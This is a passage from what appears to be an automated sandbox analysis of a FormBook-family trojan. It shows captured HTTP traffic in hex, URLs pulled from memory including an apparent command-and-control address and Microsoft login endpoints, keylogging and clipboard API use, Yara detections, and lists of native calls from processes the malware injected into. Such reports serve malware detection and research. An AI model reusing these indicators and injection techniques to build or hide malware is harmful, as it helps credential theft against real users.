d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:04 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.motorsportgives.com
            Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.motorsportgives.com/9qp3/
            Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aaa.za1.bztqk.cn/123.html
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d
            Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c
            Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6
            Source: RpcPing.exe, 00000009.00000002.3338691097.00000000030A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth
            Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000009.00000003.2979596844.0000000007C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RpcPing.exe, 00000009.00000002.3338691097.00000000030A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007C425A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007C4458
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007C425A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007B0219
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007DCDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: This is a third-party compiled AutoIt script.0_2_00753B4C
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3342c16e-e
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_65349da8-f
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fb7c4258-9
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a09d0e2e-e
            Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C223 NtClose,2_2_0042C223
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03524340 NtSetContextThread,LdrInitializeThunk,9_2_03524340
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03524650 NtSuspendThread,LdrInitializeThunk,9_2_03524650
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522B60 NtClose,LdrInitializeThunk,9_2_03522B60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03522BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03522BE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03522BA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522AD0 NtReadFile,LdrInitializeThunk,9_2_03522AD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522AF0 NtWriteFile,LdrInitializeThunk,9_2_03522AF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522F30 NtCreateSection,LdrInitializeThunk,9_2_03522F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522FE0 NtCreateFile,LdrInitializeThunk,9_2_03522FE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522FB0 NtResumeThread,LdrInitializeThunk,9_2_03522FB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03522EE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03522E80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03522D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03522D30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522DD0 NtDelayExecution,LdrInitializeThunk,9_2_03522DD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03522DF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03522C70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522C60 NtCreateKey,LdrInitializeThunk,9_2_03522C60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03522CA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035235C0 NtCreateMutant,LdrInitializeThunk,9_2_035235C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_035239B0 NtGetContextThread,LdrInitializeThunk,9_2_035239B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522B80 NtQueryInformationFile,9_2_03522B80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522AB0 NtWaitForSingleObject,9_2_03522AB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_03522F60 NtCreateProcessEx,9_2_03522F60
